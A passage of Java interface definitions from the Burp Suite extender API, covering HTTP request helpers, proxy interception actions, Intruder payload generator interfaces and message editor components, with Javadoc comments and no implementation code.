55 | * To obtain the full URL, use one of the other overloaded
56 | * analyzeRequest() methods.
57 | *
58 | * @param request The request to be analyzed.
59 | * @return An
60 | * burp.IRequestInfo object that can be queried to obtain details
61 | * about the request.
62 | */
63 | IRequestInfo analyzeRequest(byte[] request);
64 |
65 | /**
66 | * This method can be used to analyze an HTTP response, and obtain various
67 | * key details about it.
68 | *
69 | * @param response The response to be analyzed.
70 | * @return An
71 | * burp.IResponseInfo object that can be queried to obtain details
72 | * about the response.
73 | */
74 | IResponseInfo analyzeResponse(byte[] response);
75 |
76 | /**
77 | * This method can be used to retrieve details of a specified parameter
78 | * within an HTTP request. Note: Use
79 | * analyzeRequest() to obtain details of all parameters within
80 | * the request.
81 | *
82 | * @param request The request to be inspected for the specified parameter.
83 | * @param parameterName The name of the parameter to retrieve.
84 | * @return An
85 | * burp.IParameter object that can be queried to obtain details
86 | * about the parameter, or
87 | * null if the parameter was not found.
88 | */
89 | IParameter getRequestParameter(byte[] request, String parameterName);
90 |
91 | /**
92 | * This method can be used to URL-decode the specified data.
93 | *
94 | * @param data The data to be decoded.
95 | * @return The decoded data.
96 | */
97 | String urlDecode(String data);
98 |
99 | /**
100 | * This method can be used to URL-encode the specified data. Any characters
101 | * that do not need to be encoded within HTTP requests are not encoded.
102 | *
103 | * @param data The data to be encoded.
104 | * @return The encoded data.
105 | */
106 | String urlEncode(String data);
107 |
108 | /**
109 | * This method can be used to URL-decode the specified data.
110 | *
111 | * @param data The data to be decoded.
112 | * @return The decoded data.
113 | */
114 | byte[] urlDecode(byte[] data);
115 |
116 | /**
117 | * This method can be used to URL-encode the specified data. Any characters
118 | * that do not need to be encoded within HTTP requests are not encoded.
119 | *
120 | * @param data The data to be encoded.
121 | * @return The encoded data.
122 | */
123 | byte[] urlEncode(byte[] data);
124 |
125 | /**
126 | * This method can be used to Base64-decode the specified data.
127 | *
128 | * @param data The data to be decoded.
129 | * @return The decoded data.
130 | */
131 | byte[] base64Decode(String data);
132 |
133 | /**
134 | * This method can be used to Base64-decode the specified data.
135 | *
136 | * @param data The data to be decoded.
137 | * @return The decoded data.
138 | */
139 | byte[] base64Decode(byte[] data);
140 |
141 | /**
142 | * This method can be used to Base64-encode the specified data.
143 | *
144 | * @param data The data to be encoded.
145 | * @return The encoded data.
146 | */
147 | String base64Encode(String data);
148 |
149 | /**
150 | * This method can be used to Base64-encode the specified data.
151 | *
152 | * @param data The data to be encoded.
153 | * @return The encoded data.
154 | */
155 | String base64Encode(byte[] data);
156 |
157 | /**
158 | * This method can be used to convert data from String form into an array of
159 | * bytes. The conversion does not reflect any particular character set, and
160 | * a character with the hex representation 0xWXYZ will always be converted
161 | * into a byte with the representation 0xYZ. It performs the opposite
162 | * conversion to the method
163 | * bytesToString(), and byte-based data that is converted to a
164 | * String and back again using these two methods is guaranteed to retain its
165 | * integrity (which may not be the case with conversions that reflect a
166 | * given character set).
167 | *
168 | * @param data The data to be converted.
169 | * @return The converted data.
170 | */
171 | byte[] stringToBytes(String data);
172 |
173 | /**
174 | * This method can be used to convert data from an array of bytes into
175 | * String form. The conversion does not reflect any particular character
176 | * set, and a byte with the representation 0xYZ will always be converted
177 | * into a character with the hex representation 0x00YZ. It performs the
178 | * opposite conversion to the method
179 | * stringToBytes(), and byte-based data that is converted to a
180 | * String and back again using these two methods is guaranteed to retain its
181 | * integrity (which may not be the case with conversions that reflect a
182 | * given character set).
183 | *
184 | * @param data The data to be converted.
185 | * @return The converted data.
186 | */
187 | String bytesToString(byte[] data);
188 |
189 | /**
190 | * This method searches a piece of data for the first occurrence of a
191 | * specified pattern. It works on byte-based data in a way that is similar
192 | * to the way the native Java method
193 | * String.indexOf() works on String-based data.
194 | *
195 | * @param data The data to be searched.
196 | * @param pattern The pattern to be searched for.
197 | * @param caseSensitive Flags whether or not the search is case-sensitive.
198 | * @param from The offset within
199 | * data where the search should begin.
200 | * @param to The offset within
201 | * data where the search should end.
202 | * @return The offset of the first occurrence of the pattern within the
203 | * specified bounds, or -1 if no match is found.
204 | */
205 | int indexOf(byte[] data,
206 | byte[] pattern,
207 | boolean caseSensitive,
208 | int from,
209 | int to);
210 |
211 | /**
212 | * This method builds an HTTP message containing the specified headers and
213 | * message body. If applicable, the Content-Length header will be added or
214 | * updated, based on the length of the body.
215 | *
216 | * @param headers A list of headers to include in the message.
217 | * @param body The body of the message, of
218 | * null if the message has an empty body.
219 | * @return The resulting full HTTP message.
220 | */
221 | byte[] buildHttpMessage(List headers, byte[] body);
222 |
223 | /**
224 | * This method creates a GET request to the specified URL. The headers used
225 | * in the request are determined by the Request headers settings as
226 | * configured in Burp Spider's options.
227 | *
228 | * @param url The URL to which the request should be made.
229 | * @return A request to the specified URL.
230 | */
231 | byte[] buildHttpRequest(URL url);
232 |
233 | /**
234 | * This method adds a new parameter to an HTTP request, and if appropriate
235 | * updates the Content-Length header.
236 | *
237 | * @param request The request to which the parameter should be added.
238 | * @param parameter An
239 | * burp.IParameter object containing details of the parameter to be
240 | * added. Supported parameter types are:
241 | * PARAM_URL,
242 | * PARAM_BODY and
243 | * PARAM_COOKIE.
244 | * @return A new HTTP request with the new parameter added.
245 | */
246 | byte[] addParameter(byte[] request, IParameter parameter);
247 |
248 | /**
249 | * This method removes a parameter from an HTTP request, and if appropriate
250 | * updates the Content-Length header.
251 | *
252 | * @param request The request from which the parameter should be removed.
253 | * @param parameter An
254 | * burp.IParameter object containing details of the parameter to be
255 | * removed. Supported parameter types are:
256 | * PARAM_URL,
257 | * PARAM_BODY and
258 | * PARAM_COOKIE.
259 | * @return A new HTTP request with the parameter removed.
260 | */
261 | byte[] removeParameter(byte[] request, IParameter parameter);
262 |
263 | /**
264 | * This method updates the value of a parameter within an HTTP request, and
265 | * if appropriate updates the Content-Length header. Note: This
266 | * method can only be used to update the value of an existing parameter of a
267 | * specified type. If you need to change the type of an existing parameter,
268 | * you should first call
269 | * removeParameter() to remove the parameter with the old type,
270 | * and then call
271 | * addParameter() to add a parameter with the new type.
272 | *
273 | * @param request The request containing the parameter to be updated.
274 | * @param parameter An
275 | * burp.IParameter object containing details of the parameter to be
276 | * updated. Supported parameter types are:
277 | * PARAM_URL,
278 | * PARAM_BODY and
279 | * PARAM_COOKIE.
280 | * @return A new HTTP request with the parameter updated.
281 | */
282 | byte[] updateParameter(byte[] request, IParameter parameter);
283 |
284 | /**
285 | * This method can be used to toggle a request's method between GET and
286 | * POST. Parameters are relocated between the URL query string and message
287 | * body as required, and the Content-Length header is created or removed as
288 | * applicable.
289 | *
290 | * @param request The HTTP request whose method should be toggled.
291 | * @return A new HTTP request using the toggled method.
292 | */
293 | byte[] toggleRequestMethod(byte[] request);
294 |
295 | /**
296 | * This method constructs an
297 | * burp.IHttpService object based on the details provided.
298 | *
299 | * @param host The HTTP service host.
300 | * @param port The HTTP service port.
301 | * @param protocol The HTTP service protocol.
302 | * @return An
303 | * burp.IHttpService object based on the details provided.
304 | */
305 | IHttpService buildHttpService(String host, int port, String protocol);
306 |
307 | /**
308 | * This method constructs an
309 | * burp.IHttpService object based on the details provided.
310 | *
311 | * @param host The HTTP service host.
312 | * @param port The HTTP service port.
313 | * @param useHttps Flags whether the HTTP service protocol is HTTPS or HTTP.
314 | * @return An
315 | * burp.IHttpService object based on the details provided.
316 | */
317 | IHttpService buildHttpService(String host, int port, boolean useHttps);
318 |
319 | /**
320 | * This method constructs an
321 | * burp.IParameter object based on the details provided.
322 | *
323 | * @param name The parameter name.
324 | * @param value The parameter value.
325 | * @param type The parameter type, as defined in the
326 | * burp.IParameter interface.
327 | * @return An
328 | * burp.IParameter object based on the details provided.
329 | */
330 | IParameter buildParameter(String name, String value, byte type);
331 |
332 | /**
333 | * This method constructs an
334 | * burp.IScannerInsertionPoint object based on the details provided.
335 | * It can be used to quickly create a simple insertion point based on a
336 | * fixed payload location within a base request.
337 | *
338 | * @param insertionPointName The name of the insertion point.
339 | * @param baseRequest The request from which to build scan requests.
340 | * @param from The offset of the start of the payload location.
341 | * @param to The offset of the end of the payload location.
342 | * @return An
343 | * burp.IScannerInsertionPoint object based on the details provided.
344 | */
345 | IScannerInsertionPoint makeScannerInsertionPoint(
346 | String insertionPointName,
347 | byte[] baseRequest,
348 | int from,
349 | int to);
350 | }
351 |
--------------------------------------------------------------------------------
/src/main/java/burp/IExtensionStateListener.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IExtensionStateListener.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * Extensions can implement this interface and then call
12 | * burp.IBurpExtenderCallbacks.registerExtensionStateListener() to
13 | * register an extension state listener. The listener will be notified of
14 | * changes to the extension's state. Note: Any extensions that start
15 | * background threads or open system resources (such as files or database
16 | * connections) should register a listener and terminate threads / close
17 | * resources when the extension is unloaded.
18 | */
19 | public interface IExtensionStateListener
20 | {
21 | /**
22 | * This method is called when the extension is unloaded.
23 | */
24 | void extensionUnloaded();
25 | }
26 |
--------------------------------------------------------------------------------
/src/main/java/burp/IHttpListener.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IHttpListener.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * Extensions can implement this interface and then call
12 | * burp.IBurpExtenderCallbacks.registerHttpListener() to register an
13 | * HTTP listener. The listener will be notified of requests and responses made
14 | * by any Burp tool. Extensions can perform custom analysis or modification of
15 | * these messages by registering an HTTP listener.
16 | */
17 | public interface IHttpListener
18 | {
19 | /**
20 | * This method is invoked when an HTTP request is about to be issued, and
21 | * when an HTTP response has been received.
22 | *
23 | * @param toolFlag A flag indicating the Burp tool that issued the request.
24 | * Burp tool flags are defined in the
25 | * burp.IBurpExtenderCallbacks interface.
26 | * @param messageIsRequest Flags whether the method is being invoked for a
27 | * request or response.
28 | * @param messageInfo Details of the request / response to be processed.
29 | * Extensions can call the setter methods on this object to update the
30 | * current message and so modify Burp's behavior.
31 | */
32 | void processHttpMessage(int toolFlag,
33 | boolean messageIsRequest,
34 | IHttpRequestResponse messageInfo);
35 | }
36 |
--------------------------------------------------------------------------------
/src/main/java/burp/IHttpRequestResponse.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IHttpRequestResponse.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * This interface is used to retrieve and update details about HTTP messages.
12 | *
13 | * Note: The setter methods generally can only be used before the message
14 | * has been processed, and not in read-only contexts. The getter methods
15 | * relating to response details can only be used after the request has been
16 | * issued.
17 | */
18 | public interface IHttpRequestResponse
19 | {
20 | /**
21 | * This method is used to retrieve the request message.
22 | *
23 | * @return The request message.
24 | */
25 | byte[] getRequest();
26 |
27 | /**
28 | * This method is used to update the request message.
29 | *
30 | * @param message The new request message.
31 | */
32 | void setRequest(byte[] message);
33 |
34 | /**
35 | * This method is used to retrieve the response message.
36 | *
37 | * @return The response message.
38 | */
39 | byte[] getResponse();
40 |
41 | /**
42 | * This method is used to update the response message.
43 | *
44 | * @param message The new response message.
45 | */
46 | void setResponse(byte[] message);
47 |
48 | /**
49 | * This method is used to retrieve the user-annotated comment for this item,
50 | * if applicable.
51 | *
52 | * @return The user-annotated comment for this item, or null if none is set.
53 | */
54 | String getComment();
55 |
56 | /**
57 | * This method is used to update the user-annotated comment for this item.
58 | *
59 | * @param comment The comment to be assigned to this item.
60 | */
61 | void setComment(String comment);
62 |
63 | /**
64 | * This method is used to retrieve the user-annotated highlight for this
65 | * item, if applicable.
66 | *
67 | * @return The user-annotated highlight for this item, or null if none is
68 | * set.
69 | */
70 | String getHighlight();
71 |
72 | /**
73 | * This method is used to update the user-annotated highlight for this item.
74 | *
75 | * @param color The highlight color to be assigned to this item. Accepted
76 | * values are: red, orange, yellow, green, cyan, blue, pink, magenta, gray,
77 | * or a null String to clear any existing highlight.
78 | */
79 | void setHighlight(String color);
80 |
81 | /**
82 | * This method is used to retrieve the HTTP service for this request /
83 | * response.
84 | *
85 | * @return An
86 | * burp.IHttpService object containing details of the HTTP service.
87 | */
88 | IHttpService getHttpService();
89 |
90 | /**
91 | * This method is used to update the HTTP service for this request /
92 | * response.
93 | *
94 | * @param httpService An
95 | * burp.IHttpService object containing details of the new HTTP
96 | * service.
97 | */
98 | void setHttpService(IHttpService httpService);
99 |
100 | }
101 |
--------------------------------------------------------------------------------
/src/main/java/burp/IHttpRequestResponsePersisted.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IHttpRequestResponsePersisted.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * This interface is used for an
12 | * burp.IHttpRequestResponse object whose request and response messages
13 | * have been saved to temporary files using
14 | * burp.IBurpExtenderCallbacks.saveBuffersToTempFiles().
15 | */
16 | public interface IHttpRequestResponsePersisted extends IHttpRequestResponse
17 | {
18 | /**
19 | * This method is deprecated and no longer performs any action.
20 | */
21 | @Deprecated
22 | void deleteTempFiles();
23 | }
24 |
--------------------------------------------------------------------------------
/src/main/java/burp/IHttpRequestResponseWithMarkers.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IHttpRequestResponseWithMarkers.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.util.List;
11 |
12 | /**
13 | * This interface is used for an
14 | * burp.IHttpRequestResponse object that has had markers applied.
15 | * Extensions can create instances of this interface using
16 | * burp.IBurpExtenderCallbacks.applyMarkers(), or provide their own
17 | * implementation. Markers are used in various situations, such as specifying
18 | * Intruder payload positions, Scanner insertion points, and highlights in
19 | * Scanner issues.
20 | */
21 | public interface IHttpRequestResponseWithMarkers extends IHttpRequestResponse
22 | {
23 | /**
24 | * This method returns the details of the request markers.
25 | *
26 | * @return A list of index pairs representing the offsets of markers for the
27 | * request message. Each item in the list is an int[2] array containing the
28 | * start and end offsets for the marker. The method may return
29 | * null if no request markers are defined.
30 | */
31 | List getRequestMarkers();
32 |
33 | /**
34 | * This method returns the details of the response markers.
35 | *
36 | * @return A list of index pairs representing the offsets of markers for the
37 | * response message. Each item in the list is an int[2] array containing the
38 | * start and end offsets for the marker. The method may return
39 | * null if no response markers are defined.
40 | */
41 | List getResponseMarkers();
42 | }
43 |
--------------------------------------------------------------------------------
/src/main/java/burp/IHttpService.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IHttpService.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * This interface is used to provide details about an HTTP service, to which
12 | * HTTP requests can be sent.
13 | */
14 | public interface IHttpService
15 | {
16 | /**
17 | * This method returns the hostname or IP address for the service.
18 | *
19 | * @return The hostname or IP address for the service.
20 | */
21 | String getHost();
22 |
23 | /**
24 | * This method returns the port number for the service.
25 | *
26 | * @return The port number for the service.
27 | */
28 | int getPort();
29 |
30 | /**
31 | * This method returns the protocol for the service.
32 | *
33 | * @return The protocol for the service. Expected values are "http" or
34 | * "https".
35 | */
36 | String getProtocol();
37 | }
38 |
--------------------------------------------------------------------------------
/src/main/java/burp/IInterceptedProxyMessage.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IInterceptedProxyMessage.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.net.InetAddress;
11 |
12 | /**
13 | * This interface is used to represent an HTTP message that has been intercepted
14 | * by Burp Proxy. Extensions can register an
15 | * burp.IProxyListener to receive details of proxy messages using this
16 | * interface. *
17 | */
18 | public interface IInterceptedProxyMessage
19 | {
20 | /**
21 | * This action causes Burp Proxy to follow the current interception rules to
22 | * determine the appropriate action to take for the message.
23 | */
24 | static final int ACTION_FOLLOW_RULES = 0;
25 | /**
26 | * This action causes Burp Proxy to present the message to the user for
27 | * manual review or modification.
28 | */
29 | static final int ACTION_DO_INTERCEPT = 1;
30 | /**
31 | * This action causes Burp Proxy to forward the message to the remote server
32 | * or client, without presenting it to the user.
33 | */
34 | static final int ACTION_DONT_INTERCEPT = 2;
35 | /**
36 | * This action causes Burp Proxy to drop the message.
37 | */
38 | static final int ACTION_DROP = 3;
39 | /**
40 | * This action causes Burp Proxy to follow the current interception rules to
41 | * determine the appropriate action to take for the message, and then make a
42 | * second call to processProxyMessage.
43 | */
44 | static final int ACTION_FOLLOW_RULES_AND_REHOOK = 0x10;
45 | /**
46 | * This action causes Burp Proxy to present the message to the user for
47 | * manual review or modification, and then make a second call to
48 | * processProxyMessage.
49 | */
50 | static final int ACTION_DO_INTERCEPT_AND_REHOOK = 0x11;
51 | /**
52 | * This action causes Burp Proxy to skip user interception, and then make a
53 | * second call to processProxyMessage.
54 | */
55 | static final int ACTION_DONT_INTERCEPT_AND_REHOOK = 0x12;
56 |
57 | /**
58 | * This method retrieves a unique reference number for this
59 | * request/response.
60 | *
61 | * @return An identifier that is unique to a single request/response pair.
62 | * Extensions can use this to correlate details of requests and responses
63 | * and perform processing on the response message accordingly.
64 | */
65 | int getMessageReference();
66 |
67 | /**
68 | * This method retrieves details of the intercepted message.
69 | *
70 | * @return An burp.IHttpRequestResponse object containing details of
71 | * the intercepted message.
72 | */
73 | IHttpRequestResponse getMessageInfo();
74 |
75 | /**
76 | * This method retrieves the currently defined interception action. The
77 | * default action is
78 | * ACTION_FOLLOW_RULES. If multiple proxy listeners are
79 | * registered, then other listeners may already have modified the
80 | * interception action before it reaches the current listener. This method
81 | * can be used to determine whether this has occurred.
82 | *
83 | * @return The currently defined interception action. Possible values are
84 | * defined within this interface.
85 | */
86 | int getInterceptAction();
87 |
88 | /**
89 | * This method is used to update the interception action.
90 | *
91 | * @param interceptAction The new interception action. Possible values are
92 | * defined within this interface.
93 | */
94 | void setInterceptAction(int interceptAction);
95 |
96 | /**
97 | * This method retrieves the name of the Burp Proxy listener that is
98 | * processing the intercepted message.
99 | *
100 | * @return The name of the Burp Proxy listener that is processing the
101 | * intercepted message. The format is the same as that shown in the Proxy
102 | * Listeners UI - for example, "127.0.0.1:8080".
103 | */
104 | String getListenerInterface();
105 |
106 | /**
107 | * This method retrieves the client IP address from which the request for
108 | * the intercepted message was received.
109 | *
110 | * @return The client IP address from which the request for the intercepted
111 | * message was received.
112 | */
113 | InetAddress getClientIpAddress();
114 | }
115 |
--------------------------------------------------------------------------------
/src/main/java/burp/IIntruderAttack.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IIntruderAttack.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * This interface is used to hold details about an Intruder attack.
12 | */
13 | public interface IIntruderAttack
14 | {
15 | /**
16 | * This method is used to retrieve the HTTP service for the attack.
17 | *
18 | * @return The HTTP service for the attack.
19 | */
20 | IHttpService getHttpService();
21 |
22 | /**
23 | * This method is used to retrieve the request template for the attack.
24 | *
25 | * @return The request template for the attack.
26 | */
27 | byte[] getRequestTemplate();
28 |
29 | }
30 |
--------------------------------------------------------------------------------
/src/main/java/burp/IIntruderPayloadGenerator.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IIntruderPayloadGenerator.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * This interface is used for custom Intruder payload generators. Extensions
12 | * that have registered an
13 | * burp.IIntruderPayloadGeneratorFactory must return a new instance of
14 | * this interface when required as part of a new Intruder attack.
15 | */
16 | public interface IIntruderPayloadGenerator
17 | {
18 | /**
19 | * This method is used by Burp to determine whether the payload generator is
20 | * able to provide any further payloads.
21 | *
22 | * @return Extensions should return
23 | * false when all the available payloads have been used up,
24 | * otherwise
25 | * true.
26 | */
27 | boolean hasMorePayloads();
28 |
29 | /**
30 | * This method is used by Burp to obtain the value of the next payload.
31 | *
32 | * @param baseValue The base value of the current payload position. This
33 | * value may be
34 | * null if the concept of a base value is not applicable (e.g.
35 | * in a battering ram attack).
36 | * @return The next payload to use in the attack.
37 | */
38 | byte[] getNextPayload(byte[] baseValue);
39 |
40 | /**
41 | * This method is used by Burp to reset the state of the payload generator
42 | * so that the next call to
43 | * getNextPayload() returns the first payload again. This
44 | * method will be invoked when an attack uses the same payload generator for
45 | * more than one payload position, for example in a sniper attack.
46 | */
47 | void reset();
48 | }
49 |
--------------------------------------------------------------------------------
/src/main/java/burp/IIntruderPayloadGeneratorFactory.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IIntruderPayloadGeneratorFactory.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * Extensions can implement this interface and then call
12 | * burp.IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory()
13 | * to register a factory for custom Intruder payloads.
14 | */
15 | public interface IIntruderPayloadGeneratorFactory
16 | {
17 | /**
18 | * This method is used by Burp to obtain the name of the payload generator.
19 | * This will be displayed as an option within the Intruder UI when the user
20 | * selects to use extension-generated payloads.
21 | *
22 | * @return The name of the payload generator.
23 | */
24 | String getGeneratorName();
25 |
26 | /**
27 | * This method is used by Burp when the user starts an Intruder attack that
28 | * uses this payload generator.
29 | *
30 | * @param attack An
31 | * burp.IIntruderAttack object that can be queried to obtain details
32 | * about the attack in which the payload generator will be used.
33 | * @return A new instance of
34 | * burp.IIntruderPayloadGenerator that will be used to generate
35 | * payloads for the attack.
36 | */
37 | IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack);
38 | }
39 |
--------------------------------------------------------------------------------
/src/main/java/burp/IIntruderPayloadProcessor.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IIntruderPayloadProcessor.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * Extensions can implement this interface and then call
12 | * burp.IBurpExtenderCallbacks.registerIntruderPayloadProcessor() to
13 | * register a custom Intruder payload processor.
14 | */
15 | public interface IIntruderPayloadProcessor
16 | {
17 | /**
18 | * This method is used by Burp to obtain the name of the payload processor.
19 | * This will be displayed as an option within the Intruder UI when the user
20 | * selects to use an extension-provided payload processor.
21 | *
22 | * @return The name of the payload processor.
23 | */
24 | String getProcessorName();
25 |
26 | /**
27 | * This method is invoked by Burp each time the processor should be applied
28 | * to an Intruder payload.
29 | *
30 | * @param currentPayload The value of the payload to be processed.
31 | * @param originalPayload The value of the original payload prior to
32 | * processing by any already-applied processing rules.
33 | * @param baseValue The base value of the payload position, which will be
34 | * replaced with the current payload.
35 | * @return The value of the processed payload. This may be
36 | * null to indicate that the current payload should be skipped,
37 | * and the attack will move directly to the next payload.
38 | */
39 | byte[] processPayload(
40 | byte[] currentPayload,
41 | byte[] originalPayload,
42 | byte[] baseValue);
43 | }
44 |
--------------------------------------------------------------------------------
/src/main/java/burp/IMenuItemHandler.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IMenuItemHandler.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * Extensions can implement this interface and then call
12 | * burp.IBurpExtenderCallbacks.registerMenuItem() to register a custom
13 | * context menu item.
14 | *
15 | * @deprecated Use
16 | * burp.IContextMenuFactory instead.
17 | */
18 | @Deprecated
19 | public interface IMenuItemHandler
20 | {
21 | /**
22 | * This method is invoked by Burp Suite when the user clicks on a custom
23 | * menu item which the extension has registered with Burp.
24 | *
25 | * @param menuItemCaption The caption of the menu item which was clicked.
26 | * This parameter enables extensions to provide a single implementation
27 | * which handles multiple different menu items.
28 | * @param messageInfo Details of the HTTP message(s) for which the context
29 | * menu was displayed.
30 | */
31 | void menuItemClicked(
32 | String menuItemCaption,
33 | IHttpRequestResponse[] messageInfo);
34 | }
35 |
--------------------------------------------------------------------------------
/src/main/java/burp/IMessageEditor.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IMessageEditor.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.awt.Component;
11 |
12 | /**
13 | * This interface is used to provide extensions with an instance of Burp's HTTP
14 | * message editor, for the extension to use in its own UI. Extensions should
15 | * call
16 | * burp.IBurpExtenderCallbacks.createMessageEditor() to obtain an
17 | * instance of this interface.
18 | */
19 | public interface IMessageEditor
20 | {
21 | /**
22 | * This method returns the UI component of the editor, for extensions to add
23 | * to their own UI.
24 | *
25 | * @return The UI component of the editor.
26 | */
27 | Component getComponent();
28 |
29 | /**
30 | * This method is used to display an HTTP message in the editor.
31 | *
32 | * @param message The HTTP message to be displayed.
33 | * @param isRequest Flags whether the message is an HTTP request or
34 | * response.
35 | */
36 | void setMessage(byte[] message, boolean isRequest);
37 |
38 | /**
39 | * This method is used to retrieve the currently displayed message, which
40 | * may have been modified by the user.
41 | *
42 | * @return The currently displayed HTTP message.
43 | */
44 | byte[] getMessage();
45 |
46 | /**
47 | * This method is used to determine whether the current message has been
48 | * modified by the user.
49 | *
50 | * @return An indication of whether the current message has been modified by
51 | * the user since it was first displayed.
52 | */
53 | boolean isMessageModified();
54 |
55 | /**
56 | * This method returns the data that is currently selected by the user.
57 | *
58 | * @return The data that is currently selected by the user, or
59 | * null if no selection is made.
60 | */
61 | byte[] getSelectedData();
62 | }
63 |
--------------------------------------------------------------------------------
/src/main/java/burp/IMessageEditorController.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IMessageEditorController.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * This interface is used by an
12 | * burp.IMessageEditor to obtain details about the currently displayed
13 | * message. Extensions that create instances of Burp's HTTP message editor can
14 | * optionally provide an implementation of
15 | * burp.IMessageEditorController, which the editor will invoke when it
16 | * requires further information about the current message (for example, to send
17 | * it to another Burp tool). Extensions that provide custom editor tabs via an
18 | * burp.IMessageEditorTabFactory will receive a reference to an
19 | * burp.IMessageEditorController object for each tab instance they
20 | * generate, which the tab can invoke if it requires further information about
21 | * the current message.
22 | */
23 | public interface IMessageEditorController
24 | {
25 | /**
26 | * This method is used to retrieve the HTTP service for the current message.
27 | *
28 | * @return The HTTP service for the current message.
29 | */
30 | IHttpService getHttpService();
31 |
32 | /**
33 | * This method is used to retrieve the HTTP request associated with the
34 | * current message (which may itself be a response).
35 | *
36 | * @return The HTTP request associated with the current message.
37 | */
38 | byte[] getRequest();
39 |
40 | /**
41 | * This method is used to retrieve the HTTP response associated with the
42 | * current message (which may itself be a request).
43 | *
44 | * @return The HTTP response associated with the current message.
45 | */
46 | byte[] getResponse();
47 | }
48 |
--------------------------------------------------------------------------------
/src/main/java/burp/IMessageEditorTab.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IMessageEditorTab.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.awt.Component;
11 |
12 | /**
13 | * Extensions that register an
14 | * burp.IMessageEditorTabFactory must return instances of this
15 | * interface, which Burp will use to create custom tabs within its HTTP message
16 | * editors.
17 | */
18 | public interface IMessageEditorTab
19 | {
20 | /**
21 | * This method returns the caption that should appear on the custom tab when
22 | * it is displayed. Note: Burp invokes this method once when the tab
23 | * is first generated, and the same caption will be used every time the tab
24 | * is displayed.
25 | *
26 | * @return The caption that should appear on the custom tab when it is
27 | * displayed.
28 | */
29 | String getTabCaption();
30 |
31 | /**
32 | * This method returns the component that should be used as the contents of
33 | * the custom tab when it is displayed. Note: Burp invokes this
34 | * method once when the tab is first generated, and the same component will
35 | * be used every time the tab is displayed.
36 | *
37 | * @return The component that should be used as the contents of the custom
38 | * tab when it is displayed.
39 | */
40 | Component getUiComponent();
